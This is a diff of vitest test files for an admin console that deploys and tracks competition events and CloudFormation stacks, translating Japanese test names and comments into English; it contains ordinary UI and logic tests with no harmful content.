     const phases = derivePhases({ ...baseDeployment, status: "IN_PROGRESS" }, emptyProgress);
     expect(pick(phases, "cfn-deploy").status).toBe("pending");
   });
 
-  it("stackProgress=null のときも phase 列が 5 個生成されるべき", () => {
+  it("should still generate 5 phases when stackProgress=null", () => {
     const phases = derivePhases({ ...baseDeployment, status: "PENDING" }, null);
     expect(phases).toHaveLength(5);
     expect(phases[1].status).toBe("pending"); // building pending
     expect(phases[2].status).toBe("pending"); // cfn pending
   });
 
-  it("status=DELETED のとき Final phase が Skipped で表示されるべき", () => {
+  it("should show Final phase as Skipped when status=DELETED", () => {
     const phases = derivePhases({ ...baseDeployment, status: "DELETED" }, progressAllComplete);
     expect(pick(phases, "complete").status).toBe("skipped");
   });
 
-  it("status=EXPIRED / AUTO_DELETED のとき自動削除 lifecycle として表示すべき", () => {
+  it("should display as auto-delete lifecycle when status=EXPIRED / AUTO_DELETED", () => {
     const expired = derivePhases({ ...baseDeployment, status: "EXPIRED" }, emptyProgress);
     expect(pick(expired, "cfn-deploy").status).toBe("skipped");
     expect(pick(expired, "complete").status).toBe("failed");
@@ -155,7 +155,7 @@ describe("derivePhases", () => {
 
   // #818 regression: past CREATE_IN_PROGRESS event が history に残っていても、
   // stack 自体は CREATE_COMPLETE に到達しているなら cfn-deploy phase は complete。
-  it("stackStatus=CREATE_COMPLETE のとき過去 IN_PROGRESS event があっても complete にすべき (#818)", () => {
+  it("should mark complete even when past IN_PROGRESS events remain, if stackStatus=CREATE_COMPLETE (#818)", () => {
     const stuck: StackProgress = {
       ...emptyProgress,
       stackStatus: "CREATE_COMPLETE",
@@ -178,7 +178,7 @@ describe("derivePhases", () => {
     expect(pick(phases, "cfn-deploy").status).toBe("complete");
   });
 
-  it("stackStatus 未指定でも LogicalId 別最新 event を見て complete を返すべき (#818)", () => {
+  it("should return complete by looking at latest event per LogicalId even when stackStatus is missing (#818)", () => {
     // stackStatus 取得失敗の fallback path。 同 LogicalId に IN_PROGRESS と
     // COMPLETE 両方あるとき、 最新 (= COMPLETE) を採用する。
     const fallback: StackProgress = {
@@ -202,7 +202,7 @@ describe("derivePhases", () => {
     expect(pick(phases, "cfn-deploy").status).toBe("complete");
   });
 
-  it("stackStatus=ROLLBACK_COMPLETE は failed にすべき (#818)", () => {
+  it("should mark stackStatus=ROLLBACK_COMPLETE as failed (#818)", () => {
     const rolledBack: StackProgress = {
       ...emptyProgress,
       stackStatus: "ROLLBACK_COMPLETE",
@@ -212,7 +212,7 @@ describe("derivePhases", () => {
     expect(pick(phases, "cfn-deploy").status).toBe("failed");
   });
 
-  it("stackStatus=CREATE_IN_PROGRESS は in-progress にすべき (#818)", () => {
+  it("should mark stackStatus=CREATE_IN_PROGRESS as in-progress (#818)", () => {
     const inProgress: StackProgress = {
       ...emptyProgress,
       stackStatus: "CREATE_IN_PROGRESS",
@@ -224,14 +224,14 @@ describe("derivePhases", () => {
 });
 
 describe("deploySummaryTitle", () => {
-  it("COMPLETE のとき succeeded を含むべき", () => {
+  it("should include succeeded when status=COMPLETE", () => {
     expect(deploySummaryTitle({ ...baseDeployment, status: "COMPLETE" })).toMatch(/succeeded/);
   });
-  it("FAILED のとき failed を含むべき", () => {
+  it("should include failed when status=FAILED", () => {
     expect(deploySummaryTitle({ ...baseDeployment, status: "FAILED" })).toMatch(/failed/);
   });
 
-  it("EXPIRED / AUTO_DELETED のとき lifecycle label を含むべき", () => {
+  it("should include lifecycle label when status=EXPIRED / AUTO_DELETED", () => {
     expect(deploySummaryTitle({ ...baseDeployment, status: "EXPIRED" })).toMatch(/expired/);
     expect(deploySummaryTitle({ ...baseDeployment, status: "AUTO_DELETED" })).toMatch(
       /auto-deleted/,
@@ -240,7 +240,7 @@ describe("deploySummaryTitle", () => {
 });
 
 describe("buildTerminalLog", () => {
-  it("Phase ごとの header 行と events 行を出すべき", () => {
+  it("should emit header lines and event lines per phase", () => {
     const phases = derivePhases({ ...baseDeployment, status: "COMPLETE" }, progressAllComplete);
     const lines = buildTerminalLog(
       { ...baseDeployment, status: "COMPLETE" },
@@ -255,11 +255,11 @@ describe("buildTerminalLog", () => {
       "> Health Check [skipped]",
       "> Complete / Teardown [complete]",
     ]);
-    // CFn events 行に logicalResourceId が含まれるべき。
+    // CFn event lines should include logicalResourceId.
     expect(lines.some((l) => l.text.includes("MyBucket"))).toBe(true);
   });
 
-  it("consoleUrl があるとき Building phase 内に CodeBuild console link が出るべき", () => {
+  it("should show CodeBuild console link inside Building phase when consoleUrl is present", () => {
     const phases = derivePhases(
       { ...baseDeployment, status: "IN_PROGRESS" },
       progressWithCreateInProgress,

--- a/apps/application-admin-console/test/lib/event-wizard.test.ts
+++ b/apps/application-admin-console/test/lib/event-wizard.test.ts
@@ -4,7 +4,7 @@ import { computeEventWizardState, WIZARD_STEPS } from "../../src/lib/event-wizar
 const NOW_MS = new Date("2026-05-11T12:00:00Z").getTime();
 
 describe("computeEventWizardState", () => {
-  it("DRAFT のとき primary=deploy で「Deploy を押せ」を CTA に出すべき", () => {
+  it("should set primary=deploy with a 'press Deploy' CTA when status=DRAFT", () => {
     const out = computeEventWizardState({ status: "DRAFT" }, NOW_MS);
     expect(out.step).toBe("draft");
     expect(out.stepIndex).toBe(0);
@@ -13,7 +13,7 @@ describe("computeEventWizardState", () => {
     expect(out.alertType).toBe("info");
   });
 
-  it("DEPLOYING のとき primary=null で進捗 N/M を CTA に含めるべき", () => {
+  it("should set primary=null and include progress N/M in CTA when status=DEPLOYING", () => {
     const out = computeEventWizardState(
       {
         status: "DEPLOYING",
@@ -35,7 +35,7 @@ describe("computeEventWizardState", () => {
     expect(out.alertType).toBe("success");
   });
 
-  it("READY + startsAt なしのとき primary=start で「開始時刻を設定」を促すべき", () => {
+  it("should set primary=start and prompt to 'set the start time' when READY without startsAt", () => {
     const out = computeEventWizardState({ status: "READY" }, NOW_MS);
     expect(out.step).toBe("ready_unscheduled");
     expect(out.stepIndex).toBe(2);
@@ -44,7 +44,7 @@ describe("computeEventWizardState", () => {
     expect(out.alertType).toBe("info");
   });
 
-  it("READY + startsAt 未来のとき primary=null で開始予定を示すべき", () => {
+  it("should set primary=null and show the scheduled start when READY with future startsAt", () => {
     const future = new Date(NOW_MS + 60 * 60 * 1000).toISOString();
     const out = computeEventWizardState({ status: "READY", startsAt: future }, NOW_MS);
     expect(out.step).toBe("scheduled");
@@ -54,7 +54,7 @@ describe("computeEventWizardState", () => {
     expect(out.alertType).toBe("success");
   });
 
-  it("READY + startsAt 過去のとき step=in_competition で primary=null になるべき", () => {
+  it("should set step=in_competition and primary=null when READY with past startsAt", () => {
     const past = new Date(NOW_MS - 60 * 1000).toISOString();
     const out = computeEventWizardState({ status: "READY", startsAt: past }, NOW_MS);
     expect(out.step).toBe("in_competition");
@@ -64,7 +64,7 @@ describe("computeEventWizardState", () => {
     expect(out.alertType).toBe("success");
   });
 
-  it("ENDED のとき primary=delete で「Bulk Teardown を案内」すべき", () => {
+  it("should set primary=delete and guide to 'Bulk Teardown' when status=ENDED", () => {
     const out = computeEventWizardState({ status: "ENDED" }, NOW_MS);
     expect(out.step).toBe("ended");
     expect(out.stepIndex).toBe(4);
@@ -73,21 +73,21 @@ describe("computeEventWizardState", () => {
     expect(out.alertType).toBe("info");
   });
 
-  it("TEARDOWN のとき primary=null で「削除中」を warning で表示すべき", () => {
+  it("should set primary=null and show 'deleting' as warning when status=TEARDOWN", () => {
     const out = computeEventWizardState({ status: "TEARDOWN" }, NOW_MS);
     expect(out.primary).toBeNull();
     expect(out.cta).toMatch(/削除中/);
     expect(out.alertType).toBe("warning");
   });
 
-  it("ARCHIVED のとき primary=null で「閲覧のみ」と示すべき", () => {
+  it("should set primary=null and indicate 'read-only' when status=ARCHIVED", () => {
     const out = computeEventWizardState({ status: "ARCHIVED" }, NOW_MS);
     expect(out.step).toBe("archived");
     expect(out.primary).toBeNull();
     expect(out.cta).toMatch(/アーカイブ/);
   });
 
-  it("WIZARD_STEPS は重複なしの 5 段で順序固定であるべき", () => {
+  it("should keep WIZARD_STEPS as 5 unique steps with a fixed order", () => {
     expect(WIZARD_STEPS).toHaveLength(5);
     const keys = WIZARD_STEPS.map((s) => s.key);
     expect(new Set(keys).size).toBe(keys.length);

--- a/apps/application-admin-console/test/lib/friendly-error.test.ts
+++ b/apps/application-admin-console/test/lib/friendly-error.test.ts
@@ -3,7 +3,7 @@ import { ApiError } from "../../src/api/client";
 import { toFriendlyError } from "../../src/lib/friendly-error";
 
 describe("toFriendlyError", () => {
-  it("既知の backend error code (assume_role_failed) を日本語タイトル + 原因候補に展開すべき", () => {
+  it("should expand known backend error code (assume_role_failed) into Japanese title + cause candidates", () => {
     const err = new ApiError(
       422,
       '{"error":"assume_role_failed","underlyingErrorName":"AccessDenied"}',
@@ -14,13 +14,13 @@ describe("toFriendlyError", () => {
     expect(fe.possibleCauses?.length).toBeGreaterThan(0);
   });
 
-  it("既知 code (role_not_found) も mapping を引くべき", () => {
+  it("should also look up mapping for known code (role_not_found)", () => {
     const err = new ApiError(404, '{"error":"role_not_found"}');
     const fe = toFriendlyError(err);
     expect(fe.title).toMatch(/IAM Role/);
   });
 
-  it("未知の error code は title に status code を含み、 raw JSON を出さないべき", () => {
+  it("should include status code in title but NOT emit raw JSON for unknown error codes", () => {
     const err = new ApiError(500, '{"error":"unknown_thing","message":"boom"}');
     const fe = toFriendlyError(err);
     expect(fe.title).toContain("500");
@@ -28,32 +28,32 @@ describe("toFriendlyError", () => {
     expect(fe.title).not.toContain('"error"');
   });
 
-  it("body が `API 422: ...` 形 (= upstream で既に prefix されていた regression case) でも解析できるべき", () => {
+  it("should parse body in `API 422: ...` form (= regression case where upstream already prefixed)", () => {
     const err = new ApiError(422, 'API 422: {"error":"assume_role_failed"}');
     const fe = toFriendlyError(err);
     expect(fe.title).toMatch(/AssumeRole/);
   });
 
-  it("backend が text のみ返した場合は raw text を hint に置くべき (= JSON でも error key も無い)", () => {
+  it("should put raw text into hint when backend returns only text (= neither JSON nor an error key)", () => {
     const err = new ApiError(500, "Internal Server Error");
     const fe = toFriendlyError(err);
     expect(fe.title).toContain("500");
     expect(fe.hint).toBe("Internal Server Error");
   });
 
-  it("ApiError 以外の Error は message のみを title にすべき", () => {
+  it("should use message only as title for Error other than ApiError", () => {
     const fe = toFriendlyError(new Error("Network down"));
     expect(fe.title).toBe("Network down");
     expect(fe.possibleCauses).toBeUndefined();
   });
 
-  it("string 等の non-Error も toString して title にすべき", () => {
+  it("should toString non-Error values such as strings and use as title", () => {
     const fe = toFriendlyError("plain string");
     expect(fe.title).toBe("plain string");
   });
 
   // Issue #948 (ADR-020 Phase B.1): granular role gate で返る forbidden_role
-  it("forbidden_role を friendly title に展開すべき (= #948)", () => {
+  it("should expand forbidden_role into a friendly title (= #948)", () => {
     const err = new ApiError(
       403,
       '{"error":"forbidden_role","message":"あなたの tenant role ではこの操作を実行できません"}',
@@ -65,21 +65,21 @@ describe("toFriendlyError", () => {
   });
 
   // Issue #17 lock-out 防止 (= 自己 role 変更禁止)
-  it("cannot_change_own_role を friendly title に展開すべき", () => {
+  it("should expand cannot_change_own_role into a friendly title", () => {
     const err = new ApiError(409, '{"error":"cannot_change_own_role"}');
     const fe = toFriendlyError(err);
     expect(fe.title).toMatch(/自分自身の role/);
   });
 
   // Issue #925 lock-out 防止 (= 自己 delete 禁止)
-  it("cannot_delete_self を friendly title に展開すべき", () => {
+  it("should expand cannot_delete_self into a friendly title", () => {
     const err = new ApiError(409, '{"error":"cannot_delete_self"}');
     const fe = toFriendlyError(err);
     expect(fe.title).toMatch(/自分自身は削除/);
   });
 
   // Issue #950 (ADR-020 Phase D): audit table 未配線
-  it("audit_log_unconfigured を friendly title に展開すべき (= #950)", () => {
+  it("should expand audit_log_unconfigured into a friendly title (= #950)", () => {
     const err = new ApiError(503, '{"error":"audit_log_unconfigured"}');
     const fe = toFriendlyError(err);
     expect(fe.title).toMatch(/監査ログ.*未配線/);
@@ -87,19 +87,19 @@ describe("toFriendlyError", () => {
   });
 
   // Issue #949 (ADR-020 Phase C): ControlPlane UserPool 未配線
-  it("control_plane_user_pool_unconfigured を friendly title に展開すべき (= #949)", () => {
+  it("should expand control_plane_user_pool_unconfigured into a friendly title (= #949)", () => {
     const err = new ApiError(503, '{"error":"control_plane_user_pool_unconfigured"}');
     const fe = toFriendlyError(err);
     expect(fe.title).toMatch(/ControlPlane UserPool.*未配線/);
   });
 
-  it("missing_tenant_claim を friendly title に展開すべき", () => {
+  it("should expand missing_tenant_claim into a friendly title", () => {
     const err = new ApiError(401, '{"error":"missing_tenant_claim"}');
     const fe = toFriendlyError(err);
     expect(fe.title).toMatch(/tenant 識別子/);
   });
 
-  it("duplicate_user を friendly title に展開すべき", () => {
+  it("should expand duplicate_user into a friendly title", () => {
     const err = new ApiError(409, '{"error":"duplicate_user","email":"alice@example.com"}');
     const fe = toFriendlyError(err);
     expect(fe.title).toMatch(/同 email/);

--- a/apps/application-admin-console/test/lib/resource-naming.test.ts
+++ b/apps/application-admin-console/test/lib/resource-naming.test.ts
@@ -2,44 +2,44 @@ import { describe, expect, it } from "vitest";
 import { buildStackPrefix, slugify } from "../../src/lib/resource-naming";
 
 describe("slugify", () => {
-  it("英数字以外をハイフンに置換するべき", () => {
+  it("should replace non-alphanumeric characters with hyphens", () => {
     expect(slugify("Alpha Team")).toBe("alpha-team");
     expect(slugify("Team_42!")).toBe("team-42");
   });
 
-  it("先頭末尾の連続ハイフンを刈るべき", () => {
+  it("should trim leading and trailing consecutive hyphens", () => {
     expect(slugify("---hello---")).toBe("hello");
     expect(slugify("___under___")).toBe("under");
   });
 
-  it("大文字を全部小文字化するべき", () => {
+  it("should lowercase all uppercase characters", () => {
     expect(slugify("ALPHA")).toBe("alpha");
   });
 
-  it("40 文字を超えたら truncate するべき", () => {
+  it("should truncate when longer than 40 characters", () => {
     const long = "a".repeat(60);
     expect(slugify(long)).toHaveLength(40);
   });
 
-  it("空文字でも例外を出さず空を返すべき", () => {
+  it("should return empty without throwing for empty input", () => {
     expect(slugify("")).toBe("");
   });
 });
 
 describe("buildStackPrefix", () => {
-  it("`tc-{problemSlug}-{teamSlug}` を組み立てるべき", () => {
+  it("should build `tc-{problemSlug}-{teamSlug}`", () => {
     expect(buildStackPrefix("security-battle-royale", "Alpha Team")).toBe(
       "tc-security-battle-royale-alpha-team",
     );
   });
 
-  it("同一 problem でも team が違えば異なる prefix を返すべき (collision 回避の根拠)", () => {
+  it("should return different prefixes for different teams on the same problem (collision-avoidance rationale)", () => {
     const a = buildStackPrefix("p", "team-a");
     const b = buildStackPrefix("p", "team-b");
     expect(a).not.toBe(b);
   });
 
-  it("空 team でも prefix としては成立するべき (validation は呼び出し側責務)", () => {
+  it("should still produce a prefix when team is empty (validation is the caller's responsibility)", () => {
     expect(buildStackPrefix("p1", "")).toBe("tc-p1-");
   });
 });

--- a/apps/application-admin-console/test/pages/DeploymentDetail.test.tsx
+++ b/apps/application-admin-console/test/pages/DeploymentDetail.test.tsx
@@ -89,8 +89,8 @@ beforeEach(() => {
 
 afterEach(() => vi.restoreAllMocks());
 
-describe("DeploymentDetailPage (Netlify 風 phase + log view)", () => {
-  it("deployment status=COMPLETE のとき 5 phase が全部 Complete (or Skipped) で表示されるべき", async () => {
+describe("DeploymentDetailPage (Netlify-style phase + log view)", () => {
+  it("should show all 5 phases as Complete (or Skipped) when deployment status=COMPLETE", async () => {
     mocks.getDeployment.mockResolvedValue({ ...baseDeployment, status: "COMPLETE" });
     mocks.getStackProgress.mockResolvedValue({
       ...emptyProgress,
@@ -114,7 +114,7 @@ describe("DeploymentDetailPage (Netlify 風 phase + log view)", () => {
     await waitFor(() => expect(mocks.getDeployment).toHaveBeenCalled());
     await screen.findByTestId("phase-enqueued");
 
-    // 5 phase が表示されているべき
+    // all 5 phases should be displayed
     for (const id of ["enqueued", "building", "cfn-deploy", "health-check", "complete"]) {
       expect(screen.getByTestId(`phase-${id}`)).toBeInTheDocument();
     }
@@ -136,7 +136,7 @@ describe("DeploymentDetailPage (Netlify 風 phase + log view)", () => {
     expect(completePhase.getByText("Complete")).toBeInTheDocument();
   });
 
-  it("deployment status=FAILED のとき Building / CloudFormation Deploy phase が Failed で表示されるべき", async () => {
+  it("should show Building / CloudFormation Deploy phase as Failed when deployment status=FAILED", async () => {
     mocks.getDeployment.mockResolvedValue({
       ...baseDeployment,
       status: "FAILED",
@@ -159,7 +159,7 @@ describe("DeploymentDetailPage (Netlify 風 phase + log view)", () => {
     expect(screen.getAllByText(/CodeBuild failed/).length).toBeGreaterThan(0);
   });
 
-  it("deployment status=IN_PROGRESS のとき 該当 phase が In Progress で表示されるべき", async () => {
+  it("should show the relevant phase as In Progress when deployment status=IN_PROGRESS", async () => {
     mocks.getDeployment.mockResolvedValue({ ...baseDeployment, status: "IN_PROGRESS" });
     mocks.getStackProgress.mockResolvedValue({
       ...emptyProgress,
@@ -179,7 +179,7 @@ describe("DeploymentDetailPage (Netlify 風 phase + log view)", () => {
     expect(cfn.getByText("In Progress")).toBeInTheDocument();
   });
 
-  it("stackEvents が空のとき CloudFormation Deploy phase は Pending で表示されるべき", async () => {
+  it("should show CloudFormation Deploy phase as Pending when stackEvents is empty", async () => {
     mocks.getDeployment.mockResolvedValue({ ...baseDeployment, status: "IN_PROGRESS" });
     mocks.getStackProgress.mockResolvedValue(emptyProgress);
     renderPage();
@@ -188,7 +188,7 @@ describe("DeploymentDetailPage (Netlify 風 phase + log view)", () => {
     expect(cfn.getByText("Pending")).toBeInTheDocument();
   });
 
-  it("stackProgress に stuck 診断があると原因要約と復旧ヒントを表示すべき", async () => {
+  it("should show cause summary and remediation hint when stackProgress contains stuck diagnosis", async () => {
     mocks.getDeployment.mockResolvedValue({ ...baseDeployment, status: "IN_PROGRESS" });
     mocks.getStackProgress.mockResolvedValue({
       ...emptyProgress,
@@ -222,7 +222,7 @@ describe("DeploymentDetailPage (Netlify 風 phase + log view)", () => {
     expect(screen.getAllByText(/WebServer/).length).toBeGreaterThan(0);
   });
 
-  it("Maximize log button を押すと modal が開いて terminal-style log が表示されるべき", async () => {
+  it("should open modal and display terminal-style log when Maximize log button is pressed", async () => {
     mocks.getDeployment.mockResolvedValue({ ...baseDeployment, status: "IN_PROGRESS" });
     mocks.getStackProgress.mockResolvedValue({
       ...emptyProgress,
@@ -249,7 +249,7 @@ describe("DeploymentDetailPage (Netlify 風 phase + log view)", () => {
     expect(within(terminalLog).getByText(/CREATE_IN_PROGRESS MyBucket/)).toBeInTheDocument();
   });
 
-  it("consoleUrl があるとき Building phase 内に CodeBuild console link が出るべき", async () => {
+  it("should show CodeBuild console link inside Building phase when consoleUrl is present", async () => {
     mocks.getDeployment.mockResolvedValue({ ...baseDeployment, status: "IN_PROGRESS" });
     mocks.getStackProgress.mockResolvedValue({
       ...emptyProgress,

--- a/apps/application-admin-console/test/pages/EventCreate.no-verified-hint.test.tsx
+++ b/apps/application-admin-console/test/pages/EventCreate.no-verified-hint.test.tsx
@@ -61,7 +61,7 @@ beforeEach(() => {
 afterEach(() => vi.restoreAllMocks());
 
 describe("EventCreatePage #719 verified account 0 件の救済 UX", () => {
-  it("verified account が 0 件なら Alert と Competitor Accounts link を表示すべき", async () => {
+  it("should show Alert and Competitor Accounts link when there are zero verified accounts", async () => {
     mocks.listCompetitorAccounts.mockResolvedValueOnce({ items: [] });
     renderPage();
 
@@ -79,7 +79,7 @@ describe("EventCreatePage #719 verified account 0 件の救済 UX", () => {
     expect(disabledSelect).toBeDisabled();
   });
 
-  it("verified=true が 1 件あれば Alert を出さず dropdown を通常 render すべき", async () => {
+  it("should NOT show Alert and render dropdown normally when at least 1 verified=true account exists", async () => {
     mocks.listCompetitorAccounts.mockResolvedValueOnce({
       items: [
         {

--- a/apps/application-admin-console/test/pages/EventCreate.team-rows.test.ts
+++ b/apps/application-admin-console/test/pages/EventCreate.team-rows.test.ts
@@ -2,13 +2,13 @@ import { describe, expect, it } from "vitest";
 import { parseTeamCountInput, resizeTeamRows, validateTeamRows } from "../../src/pages/EventCreate";
 
 describe("resizeTeamRows", () => {
-  it("同じ team 数なら同じ配列参照を返すべき", () => {
+  it("should return the same array reference when team count is unchanged", () => {
     const rows = [{ internalSlug: "team-1", awsAccountId: "111111111111" }];
 
     expect(resizeTeamRows(rows, 1)).toBe(rows);
   });
 
-  it("team 数を減らすと末尾の row を捨てるべき", () => {
+  it("should drop trailing rows when team count is reduced", () => {
     expect(
       resizeTeamRows(
         [
@@ -20,7 +20,7 @@ describe("resizeTeamRows", () => {
     ).toEqual([{ internalSlug: "team-1", awsAccountId: "111111111111" }]);
   });
 
-  it("team 数を増やすと既存 row を保持して空の新 row を追加すべき", () => {
+  it("should keep existing rows and append empty new rows when team count is increased", () => {
     expect(resizeTeamRows([{ internalSlug: "team-1", awsAccountId: "111111111111" }], 3)).toEqual([
       { internalSlug: "team-1", awsAccountId: "111111111111" },
       { internalSlug: "team-2", awsAccountId: "" },
@@ -28,7 +28,7 @@ describe("resizeTeamRows", () => {
     ]);
   });
 
-  it("負数は 0 件として扱うべき", () => {
+  it("should treat negative count as zero rows", () => {
     expect(resizeTeamRows([{ internalSlug: "team-1", awsAccountId: "111111111111" }], -1)).toEqual(
       [],
     );
@@ -36,7 +36,7 @@ describe("resizeTeamRows", () => {
 });
 
 describe("validateTeamRows", () => {
-  it("slug/account が全て有効で重複がなければ valid を返すべき", () => {
+  it("should return valid when all slug/account are valid and have no duplicates", () => {
     expect(
       validateTeamRows([
         { internalSlug: "team-1", awsAccountId: "111111111111" },
@@ -49,7 +49,7 @@ describe("validateTeamRows", () => {
     });
   });
 
-  it("不正 slug/account と重複 slug を検出すべき", () => {
+  it("should detect invalid slug/account and duplicate slugs", () => {
     expect(
       validateTeamRows([
         { internalSlug: "Team_1", awsAccountId: "111" },
@@ -64,16 +64,16 @@ describe("validateTeamRows", () => {
 });
 
 describe("parseTeamCountInput", () => {
-  it("数字だけを取り出して上限まで clamp すべき", () => {
+  it("should extract only digits and clamp to the upper limit", () => {
     expect(parseTeamCountInput("abc12345")).toBe(99);
   });
 
-  it("空文字や数字なし入力は undefined にすべき", () => {
+  it("should return undefined for empty string or input with no digits", () => {
     expect(parseTeamCountInput("")).toBeUndefined();
     expect(parseTeamCountInput("abc")).toBeUndefined();
   });
 
-  it("0 は 0 のまま返すべき", () => {
+  it("should return 0 as-is for input '0'", () => {
     expect(parseTeamCountInput("0")).toBe(0);
   });
 });

--- a/apps/application-admin-console/test/pages/EventCreate.verified-only.test.tsx
+++ b/apps/application-admin-console/test/pages/EventCreate.verified-only.test.tsx
@@ -73,7 +73,7 @@ beforeEach(() => {
 afterEach(() => vi.restoreAllMocks());
 
 describe("EventCreatePage (Phase 2.2 verified-only)", () => {
-  it("account option は 12 桁 ID を主ラベルにして alias を補足表示するべき", () => {
+  it("should use the 12-digit ID as main label and show alias as supplementary text for account option", () => {
     const account = {
       awsAccountId: "111111111111",
       region: "ap-northeast-1",
@@ -92,7 +92,7 @@ describe("EventCreatePage (Phase 2.2 verified-only)", () => {
     expect(formatVerifiedAccountSummary(account)).toBe("111111111111 (production-shared-account)");
   });
 
-  it("0 件のとき Competitor Accounts への導線 (Alert) を表示するべき", async () => {
+  it("should show Alert with link to Competitor Accounts when there are zero accounts", async () => {
     mocks.listCompetitorAccounts.mockResolvedValueOnce({ items: [] });
     renderPage();
     // listCompetitorAccounts が呼ばれた後、warning Alert が出る
@@ -105,7 +105,7 @@ describe("EventCreatePage (Phase 2.2 verified-only)", () => {
     expect(screen.getByText(/Competitor Accounts へ移動/)).toBeInTheDocument();
   });
 
-  it("verified=false の account は drop-down 選択肢に出さないべき", async () => {
+  it("should NOT include verified=false accounts in dropdown options", async () => {
     mocks.listCompetitorAccounts.mockResolvedValueOnce({
       items: [
         {
@@ -146,7 +146,7 @@ describe("EventCreatePage (Phase 2.2 verified-only)", () => {
     expect(screen.queryByText(/Unverified Team B/)).not.toBeInTheDocument();
   });
 
-  it("API 取得 error は赤 Alert で operator に通知するべき", async () => {
+  it("should notify operator of API fetch error via red Alert", async () => {
     mocks.listCompetitorAccounts.mockRejectedValueOnce(new Error("network down"));
     renderPage();
     await waitFor(() => {

--- a/apps/application-admin-console/test/pages/EventDetail.end-now-schedule.test.tsx
+++ b/apps/application-admin-console/test/pages/EventDetail.end-now-schedule.test.tsx
@@ -82,8 +82,8 @@ beforeEach(() => {
 
 afterEach(() => vi.restoreAllMocks());
 
-describe("EventDetailPage #740 競技スケジュール終了操作", () => {
-  it("即座に終了 button で endsAt=now の schedule API を呼ぶべき", async () => {
+describe("EventDetailPage #740 competition schedule end operations", () => {
+  it("should call schedule API with endsAt=now when the 'End immediately' button is pressed", async () => {
     renderPage();
     await waitFor(() =>
       expect(screen.getAllByText(/Schedule Action Event/).length).toBeGreaterThan(0),
@@ -97,7 +97,7 @@ describe("EventDetailPage #740 競技スケジュール終了操作", () => {
     });
   });
 
-  it("競技スケジュール section の説明に内部 issue 番号を表示しないべき", async () => {
+  it("should NOT show internal issue numbers in the competition schedule section description", async () => {
     renderPage();
     await waitFor(() =>
       expect(screen.getAllByText(/Schedule Action Event/).length).toBeGreaterThan(0),

--- a/apps/application-admin-console/test/pages/EventDetail.ends-at-validation.test.tsx
+++ b/apps/application-admin-console/test/pages/EventDetail.ends-at-validation.test.tsx
@@ -108,8 +108,8 @@ beforeEach(() => {
 
 afterEach(() => vi.restoreAllMocks());
 
-describe("EventDetailPage #741 終了予約 validation", () => {
-  it("開始時刻以前の終了日時なら errorText を出して 設定 button を disabled にすべき", async () => {
+describe("EventDetailPage #741 end-time reservation validation", () => {
+  it("should show errorText and disable Submit button when end time is at or before start time", async () => {
     const dialog = await openEndsAtModal();
     await fillEndsAt(dialog, "2026-05-14T09:00:00.000Z");
 
@@ -121,7 +121,7 @@ describe("EventDetailPage #741 終了予約 validation", () => {
     expect(mocks.setEventSchedule).not.toHaveBeenCalled();
   });
 
-  it("開始時刻より後の終了日時なら 設定 button を有効化して schedule API を呼ぶべき", async () => {
+  it("should enable Submit button and call schedule API when end time is after start time", async () => {
     const dialog = await openEndsAtModal();
     await fillEndsAt(dialog, "2026-05-14T11:00:00.000Z");
 

--- a/apps/application-admin-console/test/pages/EventDetail.force-archive.test.tsx
+++ b/apps/application-admin-console/test/pages/EventDetail.force-archive.test.tsx
@@ -81,7 +81,7 @@ beforeEach(() => {
 afterEach(() => vi.restoreAllMocks());
 
 describe("EventDetailPage #708 Force ARCHIVED rescue", () => {
-  it("TEARDOWN な Event では Force ARCHIVED button + rescue Alert を表示するべき", async () => {
+  it("should show Force ARCHIVED button + rescue Alert when Event is in TEARDOWN", async () => {
     mocks.getEvent.mockResolvedValueOnce(baseDetail);
     renderPage();
     await waitFor(() =>
@@ -91,7 +91,7 @@ describe("EventDetailPage #708 Force ARCHIVED rescue", () => {
     expect(screen.getByText(/削除が進まない場合/)).toBeInTheDocument();
   });
 
-  it("DEPLOYING な Event では Force ARCHIVED rescue は表示しないべき", async () => {
+  it("should NOT show Force ARCHIVED rescue when Event is in DEPLOYING", async () => {
     mocks.getEvent.mockResolvedValueOnce({ ...baseDetail, status: "DEPLOYING" });
     renderPage();
     await waitFor(() =>
@@ -100,7 +100,7 @@ describe("EventDetailPage #708 Force ARCHIVED rescue", () => {
     expect(screen.queryByTestId("force-archive-button")).not.toBeInTheDocument();
   });
 
-  it("Force ARCHIVED を確定すると archiveEvent が呼ばれるべき", async () => {
+  it("should call archiveEvent when Force ARCHIVED is confirmed", async () => {
     mocks.getEvent.mockResolvedValue(baseDetail);
     mocks.archiveEvent.mockResolvedValue({ ok: true, archivedAt: "2026-05-13T00:00:00.000Z" });
     renderPage();

--- a/apps/application-admin-console/test/pages/EventDetail.retry-failed.test.tsx
+++ b/apps/application-admin-console/test/pages/EventDetail.retry-failed.test.tsx
@@ -86,8 +86,8 @@ beforeEach(() => {
 
 afterEach(() => vi.restoreAllMocks());
 
-describe("EventDetailPage #555 失敗分を再実行 button", () => {
-  it("FAILED な deployment が 0 件のときは button を表示しないべき", async () => {
+describe("EventDetailPage #555 retry-failed button", () => {
+  it("should NOT show button when there are zero FAILED deployments", async () => {
     mocks.getEvent.mockResolvedValueOnce({
       ...baseDetail,
       deploymentsByProblem: {
@@ -102,7 +102,7 @@ describe("EventDetailPage #555 失敗分を再実行 button", () => {
     expect(screen.queryByText(/失敗分を再実行/)).not.toBeInTheDocument();
   });
 
-  it("FAILED な deployment があると 件数つきで button を表示するべき", async () => {
+  it("should show button with count when FAILED deployments exist", async () => {
     mocks.getEvent.mockResolvedValueOnce({
       ...baseDetail,
       deploymentsByProblem: {
@@ -116,7 +116,7 @@ describe("EventDetailPage #555 失敗分を再実行 button", () => {
     expect(await screen.findByText(/失敗分を再実行 \(2 件\)/)).toBeInTheDocument();
   });
 
-  it("button を押すと bulkDeployEvent を retryFailedOnly=true で呼ぶべき", async () => {
+  it("should call bulkDeployEvent with retryFailedOnly=true when button is pressed", async () => {
     mocks.getEvent.mockResolvedValue({
       ...baseDetail,
       deploymentsByProblem: {
@@ -132,7 +132,7 @@ describe("EventDetailPage #555 失敗分を再実行 button", () => {
     });
   });
 
-  it("ARCHIVED 状態の event では button を disable するべき", async () => {
+  it("should disable button when event is in ARCHIVED state", async () => {
     mocks.getEvent.mockResolvedValueOnce({
       ...baseDetail,
       status: "ARCHIVED",
@@ -148,8 +148,8 @@ describe("EventDetailPage #555 失敗分を再実行 button", () => {
   });
 });
 
-describe("EventDetailPage #756 再デプロイ button", () => {
-  it("COMPLETE な deployment が 0 件のときは button を表示しないべき", async () => {
+describe("EventDetailPage #756 re-deploy button", () => {
